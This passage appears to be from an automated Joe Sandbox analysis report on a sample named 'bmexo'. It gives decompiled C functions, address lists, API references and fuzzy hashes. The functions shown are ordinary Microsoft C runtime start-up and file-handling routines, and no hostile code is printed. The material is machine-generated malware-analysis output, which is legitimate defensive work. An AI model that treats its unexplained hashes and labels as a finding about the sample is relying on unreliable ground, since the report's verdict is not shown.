                                          • Instruction Fuzzy Hash: D70147729003587BE7206771AC4BFDF3B9CEB61764F100461FA0197182E5B89802A27C
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
Control-flow graph blocks (id: address range, calls in the block):
• 234: f2149c-f214b0 (call f22400)
• 237: f214b2-f214b5
• 238: f214e3
• 239: f214b7-f214bc
• 240: f214e5-f214ea (call f22445)
• 241: f214eb-f21502 (call f21f5e, call f212bc)
• 242: f214be-f214c2
• 254: f21507-f2151d (call f21525)
• 244: f214d3-f214de (call f21cc3, call f21e89)
• 245: f214c4-f214d0 (call f21530)
Edges: 234->237, 234->238, 237->238, 237->239, 238->240, 239->241, 239->242, 241->254, 242->244, 242->245, 244->238, 245->244, 254->240
                                          C-Code - Quality: 89%
                                          			E00F2149C(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                                          				intOrPtr _t16;
                                          				intOrPtr _t19;
                                          				intOrPtr _t29;
                                          				void* _t32;
                                          
                                          				_push(0xc);
                                          				_push(0xf32170);
                                          				E00F22400(__ebx, __edi, __esi);
                                          				 *((intOrPtr*)(_t32 - 0x1c)) = 0;
				if( *((intOrPtr*)(_t32 + 0x10)) == 0 ||  *((intOrPtr*)(_t32 + 0x14)) == 0) { // element size or count is zero: nothing to read
					L6:
					_t16 = 0;
				} else {
					_t31 =  *((intOrPtr*)(_t32 + 0x18));
					if( *((intOrPtr*)(_t32 + 0x18)) != 0) { // stream != NULL
						E00F21F5E(_t31); // _lock_file(stream)
						 *((intOrPtr*)(_t32 - 4)) = 0;
						_t19 = E00F212BC( *((intOrPtr*)(_t32 + 8)),  *((intOrPtr*)(_t32 + 0xc)),  *((intOrPtr*)(_t32 + 0x10)),  *((intOrPtr*)(_t32 + 0x14)), _t31); // executed  -- unlocked worker: (buffer, bufferSize, elementSize, count, stream)
						_t29 = _t19;
						 *((intOrPtr*)(_t32 - 0x1c)) = _t29;
						 *((intOrPtr*)(_t32 - 4)) = 0xfffffffe;
						E00F21525(_t31); // releases the file lock taken above
						_t16 = _t29;
					} else {
						if( *((intOrPtr*)(_t32 + 0xc)) != 0xffffffff) { // bufferSize != 0xffffffff: wipe the caller's buffer
							E00F21530( *((intOrPtr*)(_t32 + 8)), 0,  *((intOrPtr*)(_t32 + 0xc))); // _memset(buffer, 0, bufferSize)
						}
						 *((intOrPtr*)(E00F21CC3())) = 0x16; // errno = 0x16 (EINVAL): NULL stream
                                          						E00F21E89();
                                          						goto L6;
                                          					}
                                          				}
                                          				return E00F22445(_t16);
                                          			}
Instruction addresses (one per line of the decompiled code above, in order; 0x00000000 marks a line with no instruction of its own):
                                          0x00f2149c
                                          0x00f2149e
                                          0x00f214a3
                                          0x00f214aa
                                          0x00f214b0
                                          0x00f214e3
                                          0x00f214e3
                                          0x00f214b7
                                          0x00f214b7
                                          0x00f214bc
                                          0x00f214ec
                                          0x00f214f2
                                          0x00f21502
                                          0x00f2150a
                                          0x00f2150c
                                          0x00f2150f
                                          0x00f21516
                                          0x00f2151b
                                          0x00f214be
                                          0x00f214c2
                                          0x00f214cb
                                          0x00f214d0
                                          0x00f214d8
                                          0x00f214de
                                          0x00000000
                                          0x00f214de
                                          0x00f214bc
                                          0x00f214ea

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.979338255.0000000000F21000.00000020.00000001.01000000.00000005.sdmp, Offset: 00F20000, based on PE: true
• Associated: 00000005.00000002.979331640.0000000000F20000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000005.00000002.979347417.0000000000F2E000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000005.00000002.979353887.0000000000F33000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000005.00000002.979359821.0000000000F37000.00000002.00000001.01000000.00000005.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_f20000_bmexo.jbxd
                                          Similarity
                                          • API ID: __lock_file_memset
                                          • String ID:
                                          • API String ID: 26237723-0
                                          • Opcode ID: 73b7314e4f5ddd45c35979ff5c9e79c312f3cd16fa35a07df943c92d2a174f21
                                          • Instruction ID: a4ea232022add98293206a4766ec40df1d40f51e18e540c309fbbf64920bff20
                                          • Opcode Fuzzy Hash: 73b7314e4f5ddd45c35979ff5c9e79c312f3cd16fa35a07df943c92d2a174f21
                                          • Instruction Fuzzy Hash: 88017131C00228ABCF22FFA5BC0699F7A61BFA1320F148115F82856161D7798A21FB95
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          (control-flow graph image: basic block f211dd-f211f1, call f211f2; legend: Executed / Not Executed)
                                          C-Code - Quality: 25%
                                          			// Thin wrapper: pushes 0x40 (_SH_DENYNO) as the share flag and forwards to E00F211F2;
                                          			// this matches the MSVC CRT pattern of _wfopen calling _wfsopen (see API ID below).
                                          			E00F211DD(intOrPtr _a4, intOrPtr _a8) {
                                          				void* __ebp;
                                          				void* _t3;
                                          				void* _t4;
                                          				void* _t5;
                                          				void* _t6;
                                          				void* _t9;
                                          
                                          				_push(0x40);
                                          				_push(_a8);
                                          				_push(_a4);
                                          				_t3 = E00F211F2(_t4, _t5, _t6, _t9); // executed
                                          				return _t3;
                                          			}

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.979338255.0000000000F21000.00000020.00000001.01000000.00000005.sdmp, Offset: 00F20000, based on PE: true
                                          • Associated: 00000005.00000002.979331640.0000000000F20000.00000002.00000001.01000000.00000005.sdmp
                                          • Associated: 00000005.00000002.979347417.0000000000F2E000.00000002.00000001.01000000.00000005.sdmp
                                          • Associated: 00000005.00000002.979353887.0000000000F33000.00000004.00000001.01000000.00000005.sdmp
                                          • Associated: 00000005.00000002.979359821.0000000000F37000.00000002.00000001.01000000.00000005.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_f20000_bmexo.jbxd
                                          Similarity
                                          • API ID: __wfsopen
                                          • String ID:
                                          • API String ID: 197181222-0
                                          • Opcode ID: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
                                          • Instruction ID: df102c888022a9d274b7e57d92e75bebc0ebeaa016ec37f2f3530d1948784acb
                                          • Opcode Fuzzy Hash: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
                                          • Instruction Fuzzy Hash: B6B0927244021C77CE012E82EC02A493B1EAB60660F008020FB0C18171E67BE670A6C9
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 100%
                                          			// Clears the process-wide filter and hands the exception to the default
                                          			// UnhandledExceptionFilter; matches the MSVC CRT __crtUnhandledException pattern.
                                          			E00F243CC(struct _EXCEPTION_POINTERS* _a4) {
                                          
                                          				SetUnhandledExceptionFilter(0);
                                          				return UnhandledExceptionFilter(_a4);
                                          			}

                                          APIs
                                          • SetUnhandledExceptionFilter.KERNEL32 ref: 00F243D1
                                          • UnhandledExceptionFilter.KERNEL32(?), ref: 00F243DA
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.979338255.0000000000F21000.00000020.00000001.01000000.00000005.sdmp, Offset: 00F20000, based on PE: true
                                          • Associated: 00000005.00000002.979331640.0000000000F20000.00000002.00000001.01000000.00000005.sdmp
                                          • Associated: 00000005.00000002.979347417.0000000000F2E000.00000002.00000001.01000000.00000005.sdmp
                                          • Associated: 00000005.00000002.979353887.0000000000F33000.00000004.00000001.01000000.00000005.sdmp
                                          • Associated: 00000005.00000002.979359821.0000000000F37000.00000002.00000001.01000000.00000005.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_f20000_bmexo.jbxd
                                          Similarity
                                          • API ID: ExceptionFilterUnhandled
                                          • String ID:
                                          • API String ID: 3192549508-0
                                          • Opcode ID: 8e4da8b66900af92ec3077b53a1111735cc3924cc4ae25843c4cc3fdbb422a1f
                                          • Instruction ID: 8bf6c868a2ec8fe44b6e38d0ba6408ece2b02c76f23bc02e1f27048379ec848c
                                          • Opcode Fuzzy Hash: 8e4da8b66900af92ec3077b53a1111735cc3924cc4ae25843c4cc3fdbb422a1f
                                          • Instruction Fuzzy Hash: 44B0923504420CABCB102B91EC0EB483F28EB14752F100420FA0D440608B725422AA92
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 100%
                                          			// Direct wrapper around SetUnhandledExceptionFilter (CRT __crtSetUnhandledExceptionFilter pattern).
                                          			E00F2439B(_Unknown_base(*)()* _a4) {
                                          
                                          				return SetUnhandledExceptionFilter(_a4);
                                          			}

                                          APIs
                                          • SetUnhandledExceptionFilter.KERNEL32 ref: 00F243A1
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.979338255.0000000000F21000.00000020.00000001.01000000.00000005.sdmp, Offset: 00F20000, based on PE: true
                                          • Associated: 00000005.00000002.979331640.0000000000F20000.00000002.00000001.01000000.00000005.sdmp
                                          • Associated: 00000005.00000002.979347417.0000000000F2E000.00000002.00000001.01000000.00000005.sdmp
                                          • Associated: 00000005.00000002.979353887.0000000000F33000.00000004.00000001.01000000.00000005.sdmp
                                          • Associated: 00000005.00000002.979359821.0000000000F37000.00000002.00000001.01000000.00000005.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_f20000_bmexo.jbxd
                                          Similarity
                                          • API ID: ExceptionFilterUnhandled
                                          • String ID:
                                          • API String ID: 3192549508-0
                                          • Opcode ID: 524f178d1d168c7776b865635a2ffeca1aeb4b5de449437ab329802d5afe3588
                                          • Instruction ID: 583cd3ee69341acc83d8dfcbf9764f89d97bc1ec3815e905c9222b5f099dbcf9
                                          • Opcode Fuzzy Hash: 524f178d1d168c7776b865635a2ffeca1aeb4b5de449437ab329802d5afe3588
                                          • Instruction Fuzzy Hash: EEA0113000020CAB8A002B82EC0A8883F2CEB002A0B000020F80C000208B32A822AA82
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000005.00000002.979087445.0000000000160000.00000040.00001000.00020000.00000000.sdmp, Offset: 00160000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_160000_bmexo.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: b69271ece767db0df3bd79ea24b885f0a386d22ec4868d9885c5a4a7ad9c1c4f
                                          • Instruction ID: ac190ed5d66fb63fd26bcc63697603389345e1dac989897d789c076448ddbc5a
                                          • Opcode Fuzzy Hash: b69271ece767db0df3bd79ea24b885f0a386d22ec4868d9885c5a4a7ad9c1c4f
                                          • Instruction Fuzzy Hash: BFA1041485D2DDADCB06CBF981507FCBFB05E2A102F4845C6E4E5A6283C53A938EDB21
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 86%
                                          			// CRT start-up I/O initialisation: allocates 0x40-byte FILE-handle records in blocks of 0x20
                                                    			// (up to 0x800 handles), imports inherited handles from GetStartupInfoW's lpReserved2 block,
                                          			// then binds the three standard handles via GetStdHandle. Matches the MSVC CRT _ioinit pattern.
                                          			E00F238A8(void* __ebx, void* __edi, void* __esi, void* __eflags) {
                                          				signed int _t82;
                                          				signed int _t86;
                                          				long _t90;
                                          				void* _t91;
                                          				signed int _t94;
                                          				signed int _t98;
                                          				signed int _t99;
                                          				signed char _t103;
                                          				signed int _t105;
                                          				intOrPtr _t106;
                                          				intOrPtr* _t109;
                                          				signed char _t111;
                                          				long _t119;
                                          				intOrPtr _t129;
                                          				signed int _t133;
                                          				void* _t135;
                                          				signed int _t138;
                                          				void** _t139;
                                          				signed int _t141;
                                          				signed int _t142;
                                          				signed int _t143;
                                          				signed int _t147;
                                          				signed int _t149;
                                          				void* _t150;
                                          				signed int _t154;
                                          				void* _t155;
                                          				void* _t156;
                                          
                                          				_push(0x64);
                                          				_push(0xf32260);
                                          				E00F22400(__ebx, __edi, __esi);
                                          				E00F2442F(0xb);
                                          				 *((intOrPtr*)(_t155 - 4)) = 0;
                                          				_push(0x40);
                                          				_t141 = 0x20;
                                          				_push(_t141);
                                          				_t82 = E00F24869();
                                          				_t133 = _t82;
                                          				 *(_t155 - 0x24) = _t133;
                                          				if(_t133 != 0) {
                                          					 *0xf34848 = _t82;
                                          					 *0xf350e4 = _t141;
                                          					while(1) {
                                          						__eflags = _t133 - 0x800 + _t82;
                                          						if(_t133 >= 0x800 + _t82) {
                                          							break;
                                          						}
                                          						 *((short*)(_t133 + 4)) = 0xa00;
                                          						 *_t133 =  *_t133 | 0xffffffff;
                                          						 *((intOrPtr*)(_t133 + 8)) = 0;
                                          						 *(_t133 + 0x24) =  *(_t133 + 0x24) & 0x00000080;
                                          						 *(_t133 + 0x24) =  *(_t133 + 0x24) & 0x0000007f;
                                          						 *((short*)(_t133 + 0x25)) = 0xa0a;
                                          						 *((intOrPtr*)(_t133 + 0x38)) = 0;
                                          						 *((char*)(_t133 + 0x34)) = 0;
                                          						_t133 = _t133 + 0x40;
                                          						 *(_t155 - 0x24) = _t133;
                                          						_t82 =  *0xf34848; // 0x77f230
                                          					}
                                          					GetStartupInfoW(_t155 - 0x74);
                                          					__eflags =  *((short*)(_t155 - 0x42));
                                          					if( *((short*)(_t155 - 0x42)) == 0) {
                                          						L27:
                                          						_t129 = 0xfffffffe;
                                          						L28:
                                          						_t142 = 0;
                                          						__eflags = 0;
                                          						while(1) {
                                          							 *(_t155 - 0x2c) = _t142;
                                          							__eflags = _t142 - 3;
                                          							if(_t142 >= 3) {
                                          								break;
                                          							}
                                          							_t147 = (_t142 << 6) +  *0xf34848;
                                          							 *(_t155 - 0x24) = _t147;
                                          							__eflags =  *_t147 - 0xffffffff;
                                          							if( *_t147 == 0xffffffff) {
                                          								L33:
                                          								 *(_t147 + 4) = 0x81;
                                          								__eflags = _t142;
                                          								if(_t142 != 0) {
                                          									_t65 = _t142 - 1; // -1
                                          									asm("sbb eax, eax");
                                          									_t90 =  ~_t65 + 0xfffffff5;
                                          									__eflags = _t90;
                                          								} else {
                                          									_t90 = 0xfffffff6;
                                          								}
                                          								_t91 = GetStdHandle(_t90);
                                          								 *(_t155 - 0x1c) = _t91;
                                          								__eflags = _t91 - 0xffffffff;
                                          								if(_t91 == 0xffffffff) {
                                          									L45:
                                          									 *(_t147 + 4) =  *(_t147 + 4) | 0x00000040;
                                          									 *_t147 = _t129;
                                          									_t94 =  *0xf36100;
                                          									__eflags = _t94;
                                          									if(_t94 != 0) {
                                          										 *((intOrPtr*)( *((intOrPtr*)(_t94 + _t142 * 4)) + 0x10)) = _t129;
                                          									}
                                          									goto L47;
                                          								} else {
                                          									__eflags = _t91;
                                          									if(_t91 == 0) {
                                          										goto L45;
                                          									}
                                          									_t98 = GetFileType(_t91);
                                          									__eflags = _t98;
                                          									if(_t98 == 0) {
                                          										goto L45;
                                          									}
                                          									 *_t147 =  *(_t155 - 0x1c);
                                          									_t99 = _t98 & 0x000000ff;
                                          									__eflags = _t99 - 2;
                                          									if(_t99 != 2) {
                                          										__eflags = _t99 - 3;
                                          										if(_t99 != 3) {
                                          											L44:
                                          											_t71 = _t147 + 0xc; // -15943740
                                          											E00F240A2(_t71, 0xfa0, 0);
                                          											_t156 = _t156 + 0xc;
                                          											 *((intOrPtr*)(_t147 + 8)) =  *((intOrPtr*)(_t147 + 8)) + 1;
                                          											L47:
                                          											_t142 = _t142 + 1;
                                          											continue;
                                          										}
                                          										_t103 =  *(_t147 + 4) | 0x00000008;
                                          										__eflags = _t103;
                                          										L43:
                                          										 *(_t147 + 4) = _t103;
                                          										goto L44;
                                          									}
                                          									_t103 =  *(_t147 + 4) | 0x00000040;
                                          									goto L43;
                                          								}
                                          							}
                                          							__eflags =  *_t147 - _t129;
                                          							if( *_t147 == _t129) {
                                          								goto L33;
                                          							}
                                          							 *(_t147 + 4) =  *(_t147 + 4) | 0x00000080;
                                          							goto L47;
                                          						}
                                          						 *((intOrPtr*)(_t155 - 4)) = _t129;
                                          						E00F23B53();
                                          						_t86 = 0;
                                          						__eflags = 0;
                                          						L49:
                                          						return E00F22445(_t86);
                                          					}
                                          					_t105 =  *(_t155 - 0x40);
                                          					__eflags = _t105;
                                          					if(_t105 == 0) {
                                          						goto L27;
                                          					}
                                          					_t135 =  *_t105;
                                          					 *(_t155 - 0x1c) = _t135;
                                          					_t106 = _t105 + 4;
                                          					 *((intOrPtr*)(_t155 - 0x28)) = _t106;
                                          					 *(_t155 - 0x20) = _t106 + _t135;
                                          					__eflags = _t135 - 0x800;
                                          					if(_t135 >= 0x800) {
                                          						_t135 = 0x800;
                                          						 *(_t155 - 0x1c) = 0x800;
                                          					}
                                          					_t149 = 1;
                                          					__eflags = 1;
                                          					 *(_t155 - 0x30) = 1;
                                          					while(1) {
                                          						__eflags =  *0xf350e4 - _t135; // 0x20
                                          						if(__eflags >= 0) {
                                          							break;
                                          						}
                                          						_t138 = E00F24869(_t141, 0x40);
                                          						 *(_t155 - 0x24) = _t138;
                                          						__eflags = _t138;
                                          						if(_t138 != 0) {
                                          							0xf34848[_t149] = _t138;
                                          							 *0xf350e4 =  *0xf350e4 + _t141;
                                          							__eflags =  *0xf350e4;
                                          							while(1) {
                                          								__eflags = _t138 - 0x800 + 0xf34848[_t149];
                                          								if(_t138 >= 0x800 + 0xf34848[_t149]) {
                                          									break;
                                          								}
                                          								 *((short*)(_t138 + 4)) = 0xa00;
                                          								 *_t138 =  *_t138 | 0xffffffff;
                                          								 *((intOrPtr*)(_t138 + 8)) = 0;
                                          								 *(_t138 + 0x24) =  *(_t138 + 0x24) & 0x00000080;
                                          								 *((short*)(_t138 + 0x25)) = 0xa0a;
                                          								 *((intOrPtr*)(_t138 + 0x38)) = 0;
                                          								 *((char*)(_t138 + 0x34)) = 0;
                                          								_t138 = _t138 + 0x40;
                                          								 *(_t155 - 0x24) = _t138;
                                          							}
                                          							_t149 = _t149 + 1;
                                          							 *(_t155 - 0x30) = _t149;
                                          							_t135 =  *(_t155 - 0x1c);
                                          							continue;
                                          						}
                                          						_t135 =  *0xf350e4; // 0x20
                                          						 *(_t155 - 0x1c) = _t135;
                                          						break;
                                          					}
                                          					_t143 = 0;
                                          					 *(_t155 - 0x2c) = 0;
                                          					_t129 = 0xfffffffe;
                                          					_t109 =  *((intOrPtr*)(_t155 - 0x28));
                                          					_t139 =  *(_t155 - 0x20);
                                          					while(1) {
                                          						__eflags = _t143 - _t135;
                                          						if(_t143 >= _t135) {
                                          							goto L28;
                                          						}
                                          						_t150 =  *_t139;
                                          						__eflags = _t150 - 0xffffffff;
                                          						if(_t150 == 0xffffffff) {
                                          							L22:
                                          							_t143 = _t143 + 1;
                                          							 *(_t155 - 0x2c) = _t143;
                                          							_t109 =  *((intOrPtr*)(_t155 - 0x28)) + 1;
                                          							 *((intOrPtr*)(_t155 - 0x28)) = _t109;
                                          							_t139 =  &(_t139[1]);
                                          							 *(_t155 - 0x20) = _t139;
                                          							continue;
                                          						}
                                          						__eflags = _t150 - _t129;
                                          						if(_t150 == _t129) {
                                          							goto L22;
                                          						}
                                          						_t111 =  *_t109;
                                          						__eflags = _t111 & 0x00000001;
                                          						if((_t111 & 0x00000001) == 0) {
                                          							goto L22;
                                          						}
                                          						__eflags = _t111 & 0x00000008;
                                          						if((_t111 & 0x00000008) != 0) {
                                          							L20:
                                          							_t154 = ((_t143 & 0x0000001f) << 6) + 0xf34848[_t143 >> 5];
                                          							 *(_t155 - 0x24) = _t154;
                                          							 *_t154 =  *_t139;
                                          							 *((char*)(_t154 + 4)) =  *((intOrPtr*)( *((intOrPtr*)(_t155 - 0x28))));
                                          							_t37 = _t154 + 0xc; // 0xd
                                          							E00F240A2(_t37, 0xfa0, 0);
                                          							_t156 = _t156 + 0xc;
                                          							_t38 = _t154 + 8;
                                          							 *_t38 =  *(_t154 + 8) + 1;
                                          							__eflags =  *_t38;
                                          							_t139 =  *(_t155 - 0x20);
                                          							L21:
                                          							_t135 =  *(_t155 - 0x1c);
                                          							goto L22;
                                          						}
                                          						_t119 = GetFileType(_t150);
                                          						_t139 =  *(_t155 - 0x20);
                                          						__eflags = _t119;
                                          						if(_t119 == 0) {
                                          							goto L21;
                                          						}
                                          						goto L20;
                                          					}
                                          					goto L28;
                                          				}
                                          				_t86 = E00F22600(_t155, 0xf33400, _t155 - 0x10, 0xfffffffe) | 0xffffffff;
                                          				goto L49;
                                          			}
                                          0x00f23b08
                                          0x00f23af9
                                          0x00000000
                                          0x00f23af9
                                          0x00f23ad5
                                          0x00f23a9f
                                          0x00f23aa1
                                          0x00000000
                                          0x00000000
                                          0x00f23aa9
                                          0x00000000
                                          0x00f23aa9
                                          0x00f23b43
                                          0x00f23b46
                                          0x00f23b4b
                                          0x00f23b4b
                                          0x00f23b4d
                                          0x00f23b52
                                          0x00f23b52
                                          0x00f2394c
                                          0x00f2394f
                                          0x00f23951
                                          0x00000000
                                          0x00000000
                                          0x00f23957
                                          0x00f23959
                                          0x00f2395c
                                          0x00f2395f
                                          0x00f23964
                                          0x00f2396c
                                          0x00f2396e
                                          0x00f23970
                                          0x00f23972
                                          0x00f23972
                                          0x00f23977
                                          0x00f23977
                                          0x00f23978
                                          0x00f2397b
                                          0x00f2397b
                                          0x00f23981
                                          0x00000000
                                          0x00000000
                                          0x00f2398d
                                          0x00f2398f
                                          0x00f23992
                                          0x00f23994
                                          0x00f23a2e
                                          0x00f23a35
                                          0x00f23a35
                                          0x00f23a3b
                                          0x00f23a47
                                          0x00f23a49
                                          0x00000000
                                          0x00000000
                                          0x00f23a4b
                                          0x00f23a51
                                          0x00f23a54
                                          0x00f23a57
                                          0x00f23a5b
                                          0x00f23a61
                                          0x00f23a64
                                          0x00f23a67
                                          0x00f23a6a
                                          0x00f23a6a
                                          0x00f23a6f
                                          0x00f23a70
                                          0x00f23a73
                                          0x00000000
                                          0x00f23a73
                                          0x00f2399a
                                          0x00f239a0
                                          0x00000000
                                          0x00f239a0
                                          0x00f239a3
                                          0x00f239a5
                                          0x00f239aa
                                          0x00f239ab
                                          0x00f239ae
                                          0x00f239b1
                                          0x00f239b1
                                          0x00f239b3
                                          0x00000000
                                          0x00000000
                                          0x00f239b9
                                          0x00f239bb
                                          0x00f239be
                                          0x00f23a1b
                                          0x00f23a1b
                                          0x00f23a1c
                                          0x00f23a22
                                          0x00f23a23
                                          0x00f23a26
                                          0x00f23a29
                                          0x00000000
                                          0x00f23a29
                                          0x00f239c0
                                          0x00f239c2
                                          0x00000000
                                          0x00000000
                                          0x00f239c4
                                          0x00f239c6
                                          0x00f239c8
                                          0x00000000
                                          0x00000000
                                          0x00f239ca
                                          0x00f239cc
                                          0x00f239dc
                                          0x00f239e9
                                          0x00f239f0
                                          0x00f239f5
                                          0x00f239fc
                                          0x00f23a06
                                          0x00f23a0a
                                          0x00f23a0f
                                          0x00f23a12
                                          0x00f23a12
                                          0x00f23a12
                                          0x00f23a15
                                          0x00f23a18
                                          0x00f23a18
                                          0x00000000
                                          0x00f23a18
                                          0x00f239cf
                                          0x00f239d5
                                          0x00f239d8
                                          0x00f239da
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00f239da
                                          0x00000000
                                          0x00f239b1
                                          0x00f238ea
                                          0x00000000

                                          APIs
                                          • __lock.LIBCMT ref: 00F238B6
                                            • Part of subcall function 00F2442F: __mtinitlocknum.LIBCMT ref: 00F24441
                                            • Part of subcall function 00F2442F: EnterCriticalSection.KERNEL32(00000000,?,00F237AB,0000000D), ref: 00F2445A
                                          • __calloc_crt.LIBCMT ref: 00F238C7
                                            • Part of subcall function 00F24869: __calloc_impl.LIBCMT ref: 00F24878
                                          • @_EH4_CallFilterFunc@8.LIBCMT ref: 00F238E2
                                          • GetStartupInfoW.KERNEL32(?,00F32260,00000064,00F21654,00F32190,00000014), ref: 00F2393B
                                          • __calloc_crt.LIBCMT ref: 00F23986
                                          • GetFileType.KERNEL32 ref: 00F239CF
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.979338255.0000000000F21000.00000020.00000001.01000000.00000005.sdmp, Offset: 00F20000, based on PE: true
                                          • Associated: 00000005.00000002.979331640.0000000000F20000.00000002.00000001.01000000.00000005.sdmp
                                          • Associated: 00000005.00000002.979347417.0000000000F2E000.00000002.00000001.01000000.00000005.sdmp
                                          • Associated: 00000005.00000002.979353887.0000000000F33000.00000004.00000001.01000000.00000005.sdmp
                                          • Associated: 00000005.00000002.979359821.0000000000F37000.00000002.00000001.01000000.00000005.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_f20000_bmexo.jbxd
                                          Similarity
                                          • API ID: __calloc_crt$CallCriticalEnterFileFilterFunc@8InfoSectionStartupType__calloc_impl__lock__mtinitlocknum
                                          • String ID:
                                          • API String ID: 2772871689-0
                                          • Opcode ID: f9df9586100333055fbc5648f6e36e04d5aa3fcaae10efe38433ebe85814fd2c
                                          • Instruction ID: dd4e4a338abbaec1797c91964a1c9e8e708664458bfbc02cccb88bade7aa4ab6
                                          • Opcode Fuzzy Hash: f9df9586100333055fbc5648f6e36e04d5aa3fcaae10efe38433ebe85814fd2c
                                          • Instruction Fuzzy Hash: 4881E5B1D052658FCB14CF68E8416A9BBF0AF45320B24426ED4A6AB3D1C73CE943EB50
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 91%
                                          			E00F23815(void* __ebx, void* __edi, void* __eflags) {
                                          				void* __esi;
                                          				void* _t3;
                                          				intOrPtr _t6;
                                          				long _t14;
                                          				long* _t27;
                                          
                                          				E00F21890(_t3);
                                          				if(E00F24560() != 0) {
                                          					_t6 = E00F24001(E00F235A6);
                                          					 *0xf3350c = _t6;
                                          					__eflags = _t6 - 0xffffffff;
                                          					if(_t6 == 0xffffffff) {
                                          						goto L1;
                                          					} else {
                                          						_t27 = E00F24869(1, 0x3bc);
                                          						__eflags = _t27;
                                          						if(_t27 == 0) {
                                          							L6:
                                          							E00F2388B();
                                          							__eflags = 0;
                                          							return 0;
                                          						} else {
                                          							__eflags = E00F2405D( *0xf3350c, _t27);
                                          							if(__eflags == 0) {
                                          								goto L6;
                                          							} else {
                                          								_push(0);
                                          								_push(_t27);
                                          								E00F23762(__ebx, __edi, _t27, __eflags);
                                          								_t14 = GetCurrentThreadId();
                                          								_t27[1] = _t27[1] | 0xffffffff;
                                          								 *_t27 = _t14;
                                          								__eflags = 1;
                                          								return 1;
                                          							}
                                          						}
                                          					}
                                          				} else {
                                          					L1:
                                          					E00F2388B();
                                          					return 0;
                                          				}
                                          			}

                                          APIs
                                          • __init_pointers.LIBCMT ref: 00F23815
                                            • Part of subcall function 00F21890: RtlEncodePointer.NTDLL(00000000,?,00F2381A,00F2163A,00F32190,00000014), ref: 00F21893
                                            • Part of subcall function 00F21890: __initp_misc_winsig.LIBCMT ref: 00F218AE
                                            • Part of subcall function 00F21890: GetModuleHandleW.KERNEL32(kernel32.dll), ref: 00F24117
                                            • Part of subcall function 00F21890: GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 00F2412B
                                            • Part of subcall function 00F21890: GetProcAddress.KERNEL32(00000000,FlsFree), ref: 00F2413E
                                            • Part of subcall function 00F21890: GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 00F24151
                                            • Part of subcall function 00F21890: GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00F24164
                                            • Part of subcall function 00F21890: GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 00F24177
                                            • Part of subcall function 00F21890: GetProcAddress.KERNEL32(00000000,CreateEventExW), ref: 00F2418A
                                            • Part of subcall function 00F21890: GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 00F2419D
                                            • Part of subcall function 00F21890: GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 00F241B0
                                            • Part of subcall function 00F21890: GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 00F241C3
                                            • Part of subcall function 00F21890: GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 00F241D6
                                            • Part of subcall function 00F21890: GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 00F241E9
                                            • Part of subcall function 00F21890: GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 00F241FC
                                            • Part of subcall function 00F21890: GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 00F2420F
                                            • Part of subcall function 00F21890: GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 00F24222
                                            • Part of subcall function 00F21890: GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 00F24235
                                          • __mtinitlocks.LIBCMT ref: 00F2381A
                                          • __mtterm.LIBCMT ref: 00F23823
                                            • Part of subcall function 00F2388B: DeleteCriticalSection.KERNEL32(00000000,00000000,?,?,00F23828,00F2163A,00F32190,00000014), ref: 00F2447A
                                            • Part of subcall function 00F2388B: _free.LIBCMT ref: 00F24481
                                            • Part of subcall function 00F2388B: DeleteCriticalSection.KERNEL32(00F33558,?,?,00F23828,00F2163A,00F32190,00000014), ref: 00F244A3
                                          • __calloc_crt.LIBCMT ref: 00F23848
                                          • __initptd.LIBCMT ref: 00F2386A
                                          • GetCurrentThreadId.KERNEL32(00F2163A,00F32190,00000014), ref: 00F23871
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.979338255.0000000000F21000.00000020.00000001.01000000.00000005.sdmp, Offset: 00F20000, based on PE: true
                                          • Associated: 00000005.00000002.979331640.0000000000F20000.00000002.00000001.01000000.00000005.sdmp
                                          • Associated: 00000005.00000002.979347417.0000000000F2E000.00000002.00000001.01000000.00000005.sdmp
